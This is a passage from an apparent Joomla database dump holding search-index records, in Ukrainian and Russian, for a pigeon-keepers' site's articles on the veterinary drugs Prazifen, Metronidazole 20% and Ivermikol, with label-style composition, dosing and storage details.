'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2461\";s:5:\"alias\";s:30:\"prazifen-glistoginnij-preparat\";s:7:\"summary\";s:2530:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/prazifen1.jpg\"><img src=\"https://malehus.in.ua/images/stories/prazifen1.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></a></p><p>1 таблетка містить 1,43 мг празиквантелу, 11,43 мг фенбендазолу.<br>  <br>  Фармакологічні  властивості:<br>  Празіфен - антигельмінтний препарат, дія якого зумовлена  вмістом празіквантелу та фенбендазолу відносно нематод та цестод у голубів. Сумiсна дiя празіквантелу і фенбендазолу розширює дiапазон антигельмінтної дii препарату, не вимагає збiльшення дози при змiшаних гельмiнтозах i робить дегельмiнтизацiю більш ефективною,<br>  <br>  Застосування:<br>  Препарат застосовують для лікування і профілактики  цестодозов, нематодозов у голубів.<br>  <br>  Дозування:<br>  Препарат застосовують перорально індивідуально по 1 таблетці  кожному голубу вагою до 250 г одноразово. При сильній інвазії лікування  повторюють через 4-6 тижнів. З метою профілактики рекомендується обробку  повторювати кожні 4 місяці.<br>  <br>  Застереження:<br>  Не застосовувати виснаженої птиці, а також з піперазином,  холінергічних препаратами (фосфорорганічні інсектициди, антгельмінтіки) або  відразу після їх застосування.<br>  <br>  Форма  випуску:<br>  Пакети із фольги по 50 таблеток.<br>  <br>  Зберігання:<br>  Сухе темне, недоступне для дітей місце за температури від 5°  до 25°С.<br>  <br>  Термін  придатності:<br>  2 роки.<br>  <br>  Для  застосування у ветеринарній медицині:<br>  <br>  Виробник:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 07:13:22\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:35:\"2461:prazifen-glistoginnij-preparat\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:79:\"/index.php/holuby/informatsiia-holubivnykam/2461-prazifen-glistoginnij-preparat\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2461\";s:5:\"route\";s:90:\"index.php?option=com_content&view=article&id=2461:prazifen-glistoginnij-preparat&catid=135\";s:5:\"title\";s:60:\"Празіфен - глистогінний препарат\";s:11:\"description\";s:2196:\" 1 таблетка містить 1,43 мг празиквантелу, 11,43 мг фенбендазолу. Фармакологічні властивості: Празіфен - антигельмінтний препарат, дія якого зумовлена вмістом празіквантелу та фенбендазолу відносно нематод та цестод у голубів. Сумiсна дiя празіквантелу і фенбендазолу розширює дiапазон антигельмінтної дii препарату, не вимагає збiльшення дози при змiшаних гельмiнтозах i робить дегельмiнтизацiю більш ефективною, Застосування: Препарат застосовують для лікування і профілактики цестодозов, нематодозов у голубів. Дозування: Препарат застосовують перорально індивідуально по 1 таблетці кожному голубу вагою до 250 г одноразово. При сильній інвазії лікування повторюють через 4-6 тижнів. З метою профілактики рекомендується обробку повторювати кожні 4 місяці. Застереження: Не застосовувати виснаженої птиці, а також з піперазином, холінергічних препаратами (фосфорорганічні інсектициди, антгельмінтіки) або відразу після їх застосування. Форма випуску: Пакети із фольги по 50 таблеток. Зберігання: Сухе темне, недоступне для дітей місце за температури від 5° до 25°С. Термін придатності: 2роки. Для застосування у ветеринарній медицині: Виробник: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 07:13:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 07:13:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4624,'index.php?option=com_content&view=article&id=2462','index.php?option=com_content&view=article&id=2462:metronidazol-20-dlya-golubiv&catid=135','Метронідазол 20 % (для голубів)',' Белый или светло-желтый порошок или мелкий гранулят, кисло-горького вкуса. Состав 100 г препарата содержит действующее вещество: метронидазол - 20,0 г. Вспомогательные вещества: ангидрид лимонной кислоты. Фармакологические свойства Метронидазол относится к группе 5-нитроимидазола. Механизм действия метронидазола заключается в биохимическом восстановлении 5-нитрогруппы метронидазола внутриклеточными транспортными протеинами анаэробных бактерий и простейших. Восстановленная 5-нітрогруппа метронидазола взаимодействует с ДНК микробной клетки, інгибіруючи синтез ее нуклеиновых кислот, что ведет к гибели микроорганизма. Эффективен против Trichomonas vaginalis, Gardnerella vaginalis, Giardia intestinalis, Entamoeba histolytica, облигатных анаэробных бактерий ( Baderoides spp. ( Bacteroides fragilis, Bacteroides distasonis, Bacteroides ovatus, Bacteroides thetaiotaomicron, Bacteroides vulgatus), Fusobacterium spp., Veillonela spp.), некоторых грамположительных бактерий ( Eubacterium spp., Clostridium spp., Peptococcus spp., Peptostreptococcus spp). Применение Лечения голубей, больных трихомонадоз, вызванный микроорганизмами, чувствительными к метронидазолу. Дозировка Перорально в дозе 50 мг на кг массы тела. С профилактическойцелью прапарат применяют с кормом в концентрации 0,05% (в расчете на метронидазол) -25 г препарата на 10 кг корма. С лечебной целью применяют в З раза больше дозы - 0,15% (75 г препарата на 10 кг корма). При задаванні препарата с питьевой водой, профилактически применяют раствор 0,02% (10 г препарата, растворенного в 10 л питьевой воды), а лечебно - раствор 0,06% (30 г препарата, растворенного в 10 л питьевой воды). Препарат применяют не меньше, чем 19 суток. Противопоказания Повышенная чувствительность к метронидазолу. Внимание Не применять для голубей, предназначенных для забоя на м\'ясо. Форма выпуска Пакеты из алюминиевой фольги по 50 и 100 г. Хранение Сухое, темное, недоступное для детей место при температуре от 18° до 25°С. Срок годности 2 года. Для применения в ветеринарной медицине! Производитель: PFO Vetos-Farma Sp. z o.o., ul. Dzierżoniowska 21, 58-260 Bielawa, Woj. dolnośląskie ','2020-09-02 10:22:36','7c2e342bb4a45b3685c699a3d3fcae3f',1,1,1,'*','2020-09-02 07:18:03','0000-00-00 00:00:00','2020-09-02 07:18:03','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2462\";s:5:\"alias\";s:28:\"metronidazol-20-dlya-golubiv\";s:7:\"summary\";s:3977:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/metronidazol20.jpg\"><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/metronidazol20.jpg\"></a></p><p>Белый или  светло-желтый порошок или мелкий гранулят, кисло-горького вкуса.</p><p> </p><p>Состав</p><p>100 г препарата  содержит действующее вещество:</p><p>метронидазол -  20,0 г.</p><p>Вспомогательные  вещества: ангидрид лимонной кислоты.</p><p> </p><p>Фармакологические  свойства</p><p>Метронидазол  относится к группе 5-нитроимидазола. Механизм действия метронидазола  заключается в биохимическом восстановлении 5-нитрогруппы метронидазола  внутриклеточными транспортными протеинами анаэробных бактерий и простейших.  Восстановленная 5-нітрогруппа метронидазола взаимодействует с ДНК микробной  клетки, інгибіруючи синтез ее нуклеиновых кислот, что ведет к гибели  микроорганизма. Эффективен против Trichomonas vaginalis, Gardnerella vaginalis, Giardia intestinalis, Entamoeba histolytica, облигатных  анаэробных бактерий ( Baderoides spp. ( Bacteroides fragilis, Bacteroides distasonis, Bacteroides ovatus, Bacteroides thetaiotaomicron, Bacteroides vulgatus), Fusobacterium spp., Veillonela spp.), некоторых грамположительных бактерий ( Eubacterium spp., Clostridium spp., Peptococcus spp., Peptostreptococcus spp).</p><p> </p><p>Применение</p><p>Лечения голубей,  больных трихомонадоз, вызванный микроорганизмами, чувствительными к  метронидазолу.</p><p> </p><p>Дозировка</p><p>Перорально в дозе  50 мг на кг массы тела.</p><p>С  профилактической целью прапарат применяют с кормом в концентрации 0,05% (в  расчете на метронидазол) -25 г препарата на 10 кг корма.</p><p>С лечебной целью  применяют в З раза больше дозы - 0,15% (75 г препарата на 10 кг корма).</p><p>При задаванні  препарата с питьевой водой, профилактически применяют раствор 0,02% (10 г  препарата, растворенного в 10 л питьевой воды), а лечебно - раствор 0,06% (30 г  препарата, растворенного в 10 л питьевой воды).</p><p>Препарат  применяют не меньше, чем 19 суток.</p><p> </p><p>Противопоказания</p><p>Повышенная  чувствительность к метронидазолу.</p><p> </p><p>Внимание</p><p>Не применять для  голубей, предназначенных для забоя на м\'ясо.</p><p> </p><p>Форма выпуска</p><p>Пакеты из  алюминиевой фольги по 50 и 100 г.</p><p> </p><p>Хранение</p><p>Сухое, темное,  недоступное для детей место при температуре от 18° до 25°С.</p><p> </p><p>Срок годности</p><p>2 года.</p><p>Для применения в  ветеринарной медицине!</p><p> </p><p>Производитель:</p><p>PFO Vetos-Farma Sp. z o.o., ul. Dzierżoniowska 21, 58-260  Bielawa, Woj. dolnośląskie</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 07:22:36\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"7\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:33:\"2462:metronidazol-20-dlya-golubiv\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:77:\"/index.php/holuby/informatsiia-holubivnykam/2462-metronidazol-20-dlya-golubiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2462\";s:5:\"route\";s:88:\"index.php?option=com_content&view=article&id=2462:metronidazol-20-dlya-golubiv&catid=135\";s:5:\"title\";s:53:\"Метронідазол 20 % (для голубів)\";s:11:\"description\";s:3514:\" Белый или светло-желтый порошок или мелкий гранулят, кисло-горького вкуса. Состав 100 г препарата содержит действующее вещество: метронидазол - 20,0 г. Вспомогательные вещества: ангидрид лимонной кислоты. Фармакологические свойства Метронидазол относится к группе 5-нитроимидазола. Механизм действия метронидазола заключается в биохимическом восстановлении 5-нитрогруппы метронидазола внутриклеточными транспортными протеинами анаэробных бактерий и простейших. Восстановленная 5-нітрогруппа метронидазола взаимодействует с ДНК микробной клетки, інгибіруючи синтез ее нуклеиновых кислот, что ведет к гибели микроорганизма. Эффективен против Trichomonas vaginalis, Gardnerella vaginalis, Giardia intestinalis, Entamoeba histolytica, облигатных анаэробных бактерий ( Baderoides spp. ( Bacteroides fragilis, Bacteroides distasonis, Bacteroides ovatus, Bacteroides thetaiotaomicron, Bacteroides vulgatus), Fusobacterium spp., Veillonela spp.), некоторых грамположительных бактерий ( Eubacterium spp., Clostridium spp., Peptococcus spp., Peptostreptococcus spp). Применение Лечения голубей, больных трихомонадоз, вызванный микроорганизмами, чувствительными к метронидазолу. Дозировка Перорально в дозе 50 мг на кг массы тела. С профилактическойцелью прапарат применяют с кормом в концентрации 0,05% (в расчете на метронидазол) -25 г препарата на 10 кг корма. С лечебной целью применяют в З раза больше дозы - 0,15% (75 г препарата на 10 кг корма). При задаванні препарата с питьевой водой, профилактически применяют раствор 0,02% (10 г препарата, растворенного в 10 л питьевой воды), а лечебно - раствор 0,06% (30 г препарата, растворенного в 10 л питьевой воды). Препарат применяют не меньше, чем 19 суток. Противопоказания Повышенная чувствительность к метронидазолу. Внимание Не применять для голубей, предназначенных для забоя на м\'ясо. Форма выпуска Пакеты из алюминиевой фольги по 50 и 100 г. Хранение Сухое, темное, недоступное для детей место при температуре от 18° до 25°С. Срок годности 2 года. Для применения в ветеринарной медицине! Производитель: PFO Vetos-Farma Sp. z o.o., ul. Dzierżoniowska 21, 58-260 Bielawa, Woj. dolnośląskie \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 07:18:03\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 07:18:03\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4625,'index.php?option=com_content&view=article&id=2463','index.php?option=com_content&view=article&id=2463:ivermikol-dlya-golubiv-krapli&catid=135','Івермікол для голубів (краплі)',' Склад: Препарат містить діючу речовину: івермектин Фармакологічні властивості: АТСvet QP54AA, авермектини (QP54AA01, івермектин). Препарат має широкий спектр протипаразитарної дії, активний відносно вошей, кліщів, бліх, пухопероїдів та кишкових нематод. Діюча речовина препарату, івермектин, належить до хімічної групи макроциклічних лактонів. Фармакологічна дія івермектину полягає у блокаді нервової або нервово-м′язової передачі шляхом впливу на γ-аміномасляну кислоту (ГАМК), внаслідок чого порушується передача нервових імпульсів ектопаразитів і нематод, що призводить до їх паралічу і загибелі. Дорослі паразити, які паразитують на тілі птиці, після обробки препаратом “Івермікол” гинуть через 2-3 доби, дія препарату триває до 30 діб. Застосування: Лікування і профілактика голубів та декоративних птахів при ураженні ектопаразитами: кліщами, вошами, блохами, пухопероїдами та при кишкових нематодозах. Дозування: Препарат застосовувати зовнішньо одноразово. Наносити на суху та непошкоджену шкіру між лопатками птиці в наступних кількостях: 1 крапля на голуба вагою 250 г; 2 краплі на голубавагою 500 г; 1 крапля для декоративних птахів (папуг, канарок). У разі необхідності, процедуру можна повторити через 4-6 тижнів. Протипоказання: Не застосовувати птахам молодше 8 тижнів або вагою менше 100 г. Не застосовувати під час основного сезону линьки. Не застосовувати хворим та ослабленим птахам. Застереження: Запобігати попаданню препарату на слизові оболонки і в травний канал. При появі клінічних ознак ускладнень після обробки птиці препаратом звернутися до лікаря ветеринарної медицини. Після обробки препаратом птицю не рекомендується купати протягом 2 годин до повного висихання пір’яного покриву, не можна гладити і допускати її до маленьких дітей. При випадковому попаданні препарату на шкіру або слизові оболонки необхідно відразу промити їх проточною водою. Після закінчення обробки птиці необхідно вимити руки з милом. Форма випуску: Полімерні флакони по 10 мл. Зберiгання: Сухе темне недоступне для дітей місце за температури від 5° до 25 °С. Термін придатності: 2 роки. Виробник готового продукту: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89. ','2020-09-03 09:10:25','59e3673dd9a74adebe42d9354fe73ae2',1,1,1,'*','2020-09-03 06:10:25','0000-00-00 00:00:00','2020-09-03 06:10:25','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2463\";s:5:\"alias\";s:29:\"ivermikol-dlya-golubiv-krapli\";s:7:\"summary\";s:4394:\"<p>Склад:</p><p>  Препарат містить діючу речовину: івермектин<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/ivermikolgol.jpg\"><img src=\"https://malehus.in.ua/images/stories/ivermikolgol.jpg\" alt=\"\" class=\"fr-fir\" width=\"302\"></a><br>  <br>  Фармакологічні властивості:<br>  АТСvet QP54AA, авермектини (QP54AA01, івермектин).<br>  Препарат має широкий спектр протипаразитарної дії, активний відносно вошей,  кліщів, бліх, пухопероїдів та кишкових нематод.<br>  Діюча речовина препарату, івермектин, належить до хімічної групи макроциклічних  лактонів. Фармакологічна дія івермектину полягає у блокаді нервової або  нервово-м′язової передачі шляхом впливу на γ-аміномасляну кислоту  (ГАМК), внаслідок чого порушується передача нервових імпульсів ектопаразитів і  нематод, що призводить до їх паралічу і загибелі.<br>  Дорослі паразити, які паразитують на тілі птиці, після обробки препаратом  “Івермікол” гинуть через 2-3 доби, дія препарату триває до 30 діб.<br>  <br>  Застосування:<br>  Лікування і профілактика голубів та декоративних птахів при ураженні  ектопаразитами: кліщами, вошами, блохами, пухопероїдами та при кишкових  нематодозах.<br>  <br>  Дозування:<br>  Препарат застосовувати зовнішньо одноразово. Наносити на суху та непошкоджену  шкіру між лопатками птиці в наступних кількостях:<br>  1 крапля на голуба вагою 250 г;<br>  2 краплі на голуба вагою 500 г;<br>  1 крапля для декоративних птахів (папуг, канарок).<br>  У разі необхідності, процедуру можна повторити через 4-6 тижнів.<br>  <br>  Протипоказання:<br>  Не застосовувати птахам молодше 8 